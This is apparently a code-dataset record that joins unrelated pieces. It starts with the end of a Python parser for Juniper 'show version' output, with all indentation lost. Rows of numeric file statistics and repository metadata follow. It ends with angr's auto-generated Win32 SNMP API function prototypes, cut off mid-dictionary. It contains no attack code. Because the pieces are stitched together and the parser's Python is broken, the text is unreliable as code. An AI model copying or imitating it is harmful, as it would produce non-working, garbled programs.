"JUNOS Services Jflow Container package [20190621.152752_builder_junos_192_r1]":"jservices-jflow",
"JUNOS Services Deep Packet Inspection package [20190621.152752_builder_junos_192_r1]":"jservices-jdpi",
"JUNOS Services IPSec [20190621.152752_builder_junos_192_r1]":"jservices-ipsec",
"JUNOS Services IDS [20190621.152752_builder_junos_192_r1]":"jservices-ids",
"JUNOS IDP Services [20190621.152752_builder_junos_192_r1]":"jservices-idp",
"JUNOS Services HTTP Content Management package [20190621.152752_builder_junos_192_r1]":"jservices-hcm",
"JUNOS Services Flowd MS-MPC Software package [20190621.152752_builder_junos_192_r1]":"jservices-fwdd",
"JUNOS Services Crypto [20190621.152752_builder_junos_192_r1]":"jservices-crypto-base",
"JUNOS Services Captive Portal and Content Delivery Container package [20190621.152752_builder_junos_192_r1]":"jservices-cpcd",
"JUNOS Services COS [20190621.152752_builder_junos_192_r1]":"jservices-cos",
"JUNOS AppId Services [20190621.152752_builder_junos_192_r1]":"jservices-appid",
"JUNOS Services Application Level Gateways [20190621.152752_builder_junos_192_r1]":"jservices-alg",
"JUNOS Services AACL Container package [20190621.152752_builder_junos_192_r1]":"jservices-aacl",
"JUNOS Extension Toolkit [20190621.152752_builder_junos_192_r1]":"jsd-jet-1",
"JUNOS Juniper Malware Removal Tool (JMRT) [1.0.0+20190621.152752_builder_junos_192_r1]":"jmrt-base-x86-64",
"JUNOS J-Insight [20190621.152752_builder_junos_192_r1]":"jinsight",
"JUNOS Online Documentation [20190621.152752_builder_junos_192_r1]":"jdocs",
"JUNOS jail runtime [20190517.f0321c3_builder_stable_11]":"jail-runtime",
"KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built":"KERNEL"
}
for line in out.splitlines():
line = line.strip()
#re0:
m = p0.match(line)
if m:
group = m.groupdict()
multi_routing_engine_item_entry = ret_dict.setdefault("multi-routing-engine-results", {}).\
setdefault("multi-routing-engine-item", {})
software_information_entry = multi_routing_engine_item_entry.setdefault("software-information", {})
multi_routing_engine_item_entry['re-name'] = group['re_name']
continue
# Hostname: sr_hktGDS201
m = p1.match(line)
if m:
group = m.groupdict()
package_list = []
software_information_entry['host-name'] = group['host_name']
continue
# Model: vmx
m = p2.match(line)
if m:
group = m.groupdict()
software_information_entry['product-model'] = group['product_model']
software_information_entry['product-name'] = group['product_model']
continue
# Junos: 19.2R1.8
m = p3.match(line)
if m:
group = m.groupdict()
software_information_entry['junos-version'] = group['junos_version']
continue
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
m = p7.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["comment"] = group["comment"]
entry_dict["name"] = package_map[group["comment"]]
package_list.append(entry_dict)
if(group["comment"].strip() == "JUNOS jail runtime [20190517.f0321c3_builder_stable_11]"):
software_information_entry["package-information"] = package_list
continue
return ret_dict
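# Editorial walk-through of the shared p9 pattern: for the line
#   'MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC'
# p9.match(...).groupdict() yields
#   {'component': 'MGD ',            # note the trailing space, hence .strip()
#    'release': '20190606.224121_builder.r1033375',
#    'builder': 'builder',
#    'build_date': '2019-06-06 22:58:49 UTC'}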
| 54.559921
| 155
| 0.574196
| 2,955
| 27,771
| 5.176311
| 0.10423
| 0.098849
| 0.148274
| 0.183577
| 0.913768
| 0.890233
| 0.878465
| 0.854799
| 0.850288
| 0.83597
| 0
| 0.156897
| 0.316301
| 27,771
| 509
| 156
| 54.559921
| 0.648707
| 0.130892
| 0
| 0.77381
| 0
| 0.005952
| 0.507659
| 0.248377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008929
| false
| 0
| 0.011905
| 0
| 0.059524
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d3cab9d5570af4237c19902d71ef19df9fe407d2
| 29,411
|
py
|
Python
|
angr/procedures/definitions/win32_snmpapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_snmpapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_snmpapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("snmpapi.dll")
prototypes = \
{
#
'SnmpUtilOidCpy': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOidDst", "pOidSrc"]),
#
'SnmpUtilOidAppend': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOidDst", "pOidSrc"]),
#
'SnmpUtilOidNCmp': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pOid1", "pOid2", "nSubIds"]),
#
'SnmpUtilOidCmp': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOid1", "pOid2"]),
#
'SnmpUtilOidFree': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pOid"]),
#
'SnmpUtilOctetsCmp': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOctets1", "pOctets2"]),
#
'SnmpUtilOctetsNCmp': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pOctets1", "pOctets2", "nChars"]),
#
'SnmpUtilOctetsCpy': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOctetsDst", "pOctetsSrc"]),
#
'SnmpUtilOctetsFree': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pOctets"]),
#
'SnmpUtilAsnAnyCpy': SimTypeFunction([SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": 
SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAnyDst", "pAnySrc"]),
#
'SnmpUtilAsnAnyFree': SimTypeFunction([SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pAny"]),
#
'SnmpUtilVarBindCpy': SimTypeFunction([SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), 
"address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pVbDst", "pVbSrc"]),
#
'SnmpUtilVarBindFree': SimTypeFunction([SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pVb"]),
#
'SnmpUtilVarBindListCpy': SimTypeFunction([SimTypePointer(SimStruct({"list": SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), "len": SimTypeInt(signed=False, label="UInt32")}, name="SnmpVarBindList", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"list": SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": 
SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), "len": SimTypeInt(signed=False, label="UInt32")}, name="SnmpVarBindList", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pVblDst", "pVblSrc"]),
#
'SnmpUtilVarBindListFree': SimTypeFunction([SimTypePointer(SimStruct({"list": SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), "len": SimTypeInt(signed=False, label="UInt32")}, name="SnmpVarBindList", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pVbl"]),
#
'SnmpUtilMemFree': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["pMem"]),
#
'SnmpUtilMemAlloc': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["nBytes"]),
#
'SnmpUtilMemReAlloc': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["pMem", "nBytes"]),
#
